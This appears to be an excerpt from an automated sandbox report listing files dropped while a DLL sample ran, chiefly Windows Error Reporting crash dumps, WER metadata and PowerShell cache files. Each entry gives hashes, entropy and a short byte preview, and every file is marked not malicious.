                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.4.9.9.2.4.2.2.9.3.3.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.2.b.3.5.0.c.-.a.5.2.b.-.4.5.9.c.-.9.f.e.9.-.6.1.6.0.3.f.0.8.4.4.4.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.a.3.c.c.9.4.-.2.2.3.4.-.4.2.2.d.-.b.d.5.1.-.d.0.3.a.2.5.1.1.7.f.1.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.5.4.-.0.0.0.1.-.0.0.1.7.-.7.6.a.6.-.7.b.2.1.a.f.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.2././.1.3.:.0.9.:.0.7.:.1.6.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.

                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_ac76d3d55f42d8698d1e4b22618822dff34b96_7cac0383_13c853ce\Report.wer

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.8456985887519763
                                    Encrypted:false
                                    SSDEEP:96:8lX5F8cT9nYy7y9haSKzfFEpXIQcQAc60cExcw32u+a+z+HbHgbAS/YyNlISWbSB:8V562naH+wL7juq/u7sES274ItW
                                    MD5:613F641A93068DBAB700946451ECE534
                                    SHA1:9402807A974B4330A7989856A3821FAF99FA8E19
                                    SHA-256:39F32A0664DFDDC05FC3EB61E99D44D6622F45778A6EBFAF2EBC9F0F8EDE9763
                                    SHA-512:E13D5BBE6195562BD08B6D70CCDDCC572100A898A02365FF35687C74142C5D840CF3B800FC62A872E4C8AC7043E1219BCF821E473CF46DE77A066784E50F1837
                                    Malicious:false
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.4.9.9.4.0.9.2.5.7.7.6.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.1.4.9.9.4.3.1.2.8.9.2.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.c.d.d.6.f.0.-.2.7.8.d.-.4.f.5.f.-.a.b.f.5.-.4.5.d.f.3.c.b.4.8.7.9.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.d.7.1.8.f.2.-.6.e.5.d.-.4.5.b.0.-.8.b.b.0.-.b.b.4.e.8.6.c.f.0.8.8.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.5.4.-.0.0.0.1.-.0.0.1.7.-.7.6.a.6.-.7.b.2.1.a.f.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_e912ab21695e486193197883960c42688442ed7_7cac0383_1b24250e\Report.wer

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):0.8482062576733173
                                    Encrypted:false
                                    SSDEEP:96:8DXQQFr9nYyCy9haot7Jn7YpXIQcQac6pcEccw35+a+z+HbHgbAS/YyNlISWbSmp:8zHTnwH0tGtjuq/u7sfS274ItW
                                    MD5:C1804D727586FA03C9929BEA75F44214
                                    SHA1:298A2AD8FC2D5F5E4E9D8ABE8B703704F50FA54D
                                    SHA-256:472C519A2F993185C462EDF506FFBD5E1C139AF94D473D21398BD6B4759EEECC
                                    SHA-512:8D1242B78A2812F9A65428E487627D748054AEEA58F5546332901995E710F3D1A7BC1EF36F5642CB10F2B25816452123DB9B9593AAC0B35BE8A60A37C6DCF56E
                                    Malicious:false
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.4.9.9.2.8.9.1.4.3.8.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.1.4.9.9.3.1.0.0.8.1.2.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.0.0.6.a.a.2.-.9.a.b.d.-.4.1.2.4.-.9.b.9.4.-.5.f.b.c.3.e.4.9.a.d.8.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.3.a.8.e.e.c.-.7.9.8.6.-.4.3.d.f.-.8.5.d.1.-.3.d.5.c.d.b.b.e.9.c.c.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.5.4.-.0.0.0.1.-.0.0.1.7.-.7.6.a.6.-.7.b.2.1.a.f.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER16F4.tmp.dmp

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Sat Apr 23 01:12:09 2022, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):41922
                                    Entropy (8bit):1.9480086397048668
                                    Encrypted:false
                                    SSDEEP:192:+5mBoTh5NijDLY+JWti4OrKBT6I7hb/3hQh70C/Vj92jI1GFIt:emsXuLWtSra2Iy0C/6Kt
                                    MD5:6A2C469E5D8EE98CEA5459F21EC0D3F8
                                    SHA1:8CD453195450BB0A30A22B18001A6EB7B62C4921
                                    SHA-256:4ECE87A3FBE22E8238A5C4A8EC0948384B4169D37063370CDE94C1FE207A42E8
                                    SHA-512:7E16065D3B4A63948B8F1C1A665E7D7F8A110E2B59F418162E8731ADE683A19CC88EF8708CB0969D8A7484A85CDEF0E79E688E6D389D33016F95B35F0B3C5E6D
                                    Malicious:false
                                    Preview:MDMP....... .......iRcb........................4...........$................)..........`.......8...........T........... ................................................................................................U...........B..............GenuineIntelW...........T.......T...^Rcb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER1BD7.tmp.WERInternalMetadata.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8336
                                    Entropy (8bit):3.697730021064886
                                    Encrypted:false
                                    SSDEEP:192:Rrl7r3GLNiv/6bu6YoOSUhRggmftSsmdCprn89b45XsfRK5m:RrlsNiX6i6YBSUhRggmftSsmdGcf1
                                    MD5:BAB16FAD64EE9DE354E6B613A2242979
                                    SHA1:6DE0C93EDF2AB5560FEFFE9FE1F9D92D866CA392
                                    SHA-256:DD34B73EBA69F8B911431F65158281A0B1717DD54347A3F778BDB69D5DB95C73
                                    SHA-512:E9FB3069FB6C23047E7373D7B9F4EBFEA200EE3E593B7582598606D19D61B79503810AF355F174CAA7B7AE4167A83108ABA1C97B5B4DA9903CED321CF238F18A
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.4.0.<./.P.i.d.>.......

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D30.tmp.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4598
                                    Entropy (8bit):4.473891299554449
                                    Encrypted:false
                                    SSDEEP:48:cvIwSD8zs/iJgtWI9giUyWgc8sqYjhD78fm8M4J2+uZFU+q849LwKcQIcQw02d:uITfIaUTgrsqY1D4J0YtwKkw02d
                                    MD5:5521F1C6007010E32F65281637389EF1
                                    SHA1:3AF2C8760B50045A62C09CF6D65E84C93777C84F
                                    SHA-256:E0B6D98ABA05B3403B3A298134F27F23E2C8ABB29C84791A29529AD951A3C20A
                                    SHA-512:CD97F689042211C58C3FB656100B98D49636AA81C101548967D31F986B8AA0FD7DDE35E17391877C6EB68D00911CCB3E977DC3A6995D6585FD082595FB5528D5
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1483822" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER45E4.tmp.dmp

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Sat Apr 23 01:12:21 2022, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):54966
                                    Entropy (8bit):2.1904283410365792
                                    Encrypted:false
                                    SSDEEP:192:K5/sh5NijDiD3n6OrKBzruwBVxFIv393F9/KLYmCuwGCoVwsL1bUOI7cSh/bk7jA:aEXuiTFrauwfU93u7VL1bpI5aj4zR
                                    MD5:D29BCF861DE82B8EF2C4B4CB236F4A14
                                    SHA1:CF3CB6B882FD00135558486890E2B4DCB676F503
                                    SHA-256:41AAF6549F2CA0993B996D9535E38E78DBD198924DF704212700DC4430AAE38B
                                    SHA-512:3D04A4615689CB00DD12DC116532D430253CE57E5CC00606984185C2B41C6556650D033260947435A7B4FCE63429891D81F2E9D838065E939F9D6ABE0CF1DE8F
                                    Malicious:false
                                    Preview:MDMP....... .......uRcb........................4...........$...........$....)..........`.......8...........T............................................................................................................U...........B..............GenuineIntelW...........T.......T...^Rcb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A5.tmp.dmp

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Sat Apr 23 01:12:05 2022, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):42122
                                    Entropy (8bit):1.9777565374307426
                                    Encrypted:false
                                    SSDEEP:192:6542pth5NijDW2gOrKBKyI7hb/3h/bZ7Jg+yT5luen5:qHXuWsrazIDdJg+qn
                                    MD5:D8C861E1784A220342495A141161646D
                                    SHA1:D41096C4809F4AFC6C982C6AD9B028C7E63D871D
                                    SHA-256:8E50BC2DDE9F7A843352923361DFDE1204862BCDF523883B8AE9EFB664A8074A
                                    SHA-512:BD7FE851328BE59B0BEEE6650888081D79394EC0A032D5A9CE4774BD096799D5D26EFC516A20130A7C5684E437976C135E8D5B6390504F441D0AE2963256CC27
                                    Malicious:false
                                    Preview:MDMP....... .......eRcb........................4...........$................)..........`.......8...........T........... ...j............................................................................................U...........B..............GenuineIntelW...........T.......T...^Rcb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER4AD7.tmp.WERInternalMetadata.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8294
                                    Entropy (8bit):3.696880610282114
                                    Encrypted:false
                                    SSDEEP:192:Rrl7r3GLNivU6Tu6YoHSUOkgmf8SgmdCpD989bHXsfVRtm:RrlsNiM6a6YoSUOkgmf8SgmPHcfVS
                                    MD5:4E8276566E0F5F4EE2DE9AF2FC1F9583
                                    SHA1:9EFE009956124EDD248AC50DA59609C809CA343F
                                    SHA-256:175493C9030215AB5B987D34933B81EEA550C6C55A5943E0A938C6BFA7ED4927
                                    SHA-512:611D905E4E80FE660EA4BC3402B7F059B69B25B02A41E704D7A56972DF96323FEF3AB3749AC3A12F509883F518AA26239AD05FF30B88729105C205BD5AC49C17
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.4.0.<./.P.i.d.>.......

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER4C5E.tmp.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4564
                                    Entropy (8bit):4.442194983388651
                                    Encrypted:false
                                    SSDEEP:48:cvIwSD8zsBJgtWI9giUyWgc8sqYjhsJ8fm8M4J2+bFFu+q84WsKcQIcQw02d:uITfTaUTgrsqY1RJE/Kkw02d
                                    MD5:006D1060A3B9C817E7E32CB0AF1113C6
                                    SHA1:CFCD05DD725D3B3A012AA6B830FFFA42A5DE845F
                                    SHA-256:7E5D75DCDDC63D8A2A43DF40F87B4DFF54B75B4B540EEF13721B21D7515DD827
                                    SHA-512:47A39188FD3CAB32D8680AF4D51CD41AE5FDE78AE7062DAC07B97A243AF86C27CF403F9EA8FBE614F7A0FDB6521BDF745AFECF7307E1E3E06C5999ACE88511AB
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1483823" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER91A.tmp.WERInternalMetadata.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8352
                                    Entropy (8bit):3.69147029511001
                                    Encrypted:false
                                    SSDEEP:192:Rrl7r3GLNivo6Fu6Yo8SURqzpagmfHSsmdCpNA89bKX1f0GOm:RrlsNiw6s6YDSU4zpagmfHSsmuKlfj
                                    MD5:E368C3045276EBF134B315BD5D8EF7DB
                                    SHA1:A436C80D93157A854DB88E7E2F7D38BF3126786B
                                    SHA-256:535294B083E9C5C219F8866B8FA1F7A6FFB849E2BDEB4C016378FEA28312BD48
                                    SHA-512:2947061FBE9446DE17EC165FEE2B329C1F689A520F972AD982B4C84064246CE6986A509137CBF2130AB5237148E6D1BBE8C48789E348A087AB4E683CC2BF8BBF
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.4.0.<./.P.i.d.>.......

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERA83.tmp.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4665
                                    Entropy (8bit):4.429165137940979
                                    Encrypted:false
                                    SSDEEP:48:cvIwSD8zs/iJgtWI9giUyWgc8sqYjhE8fm8M4J2+AFXy+q8vQ+9KcQIcQw0Hd:uITfIaUTgrsqY1pJIyKpKkw0Hd
                                    MD5:94ECB0DA39C39AB28AA13B51A4DB3BB8
                                    SHA1:39A6B932C82740AE346C82E2AE9DF7845314111C
                                    SHA-256:78AFEE5C62B29D412B5C91DB1263E2EB057968688F7FA4D308AB8336A0D8D078
                                    SHA-512:B76C30F4C6740FE12A21D863AB68E7B35DB2C6890B30DD9F64911A8EC0E670208D0E4FAE058C742DAF8F8AFD19862B74221826D3FCE95EA0A48E74CA22130003
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1483822" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):11606
                                    Entropy (8bit):4.883977562702998
                                    Encrypted:false
                                    SSDEEP:192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ
                                    MD5:243581397F734487BD471C04FB57EA44
                                    SHA1:38CB3BAC7CDC67CB3B246B32117C2C6188243E77
                                    SHA-256:7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90
                                    SHA-512:1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A
                                    Malicious:false
                                    Preview:PSMODULECACHE.....7.t8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider...........e...[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1192
                                    Entropy (8bit):5.325275554903011
                                    Encrypted:false
                                    SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                                    MD5:05CF074042A017A42C1877FC5DB819AB
                                    SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                                    SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                                    SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                                    Malicious:false
                                    Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                    C:\Users\user\AppData\Local\Temp\RES319C.tmp

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                                    Category:dropped
                                    Size (bytes):1332
                                    Entropy (8bit):3.9920012545315475
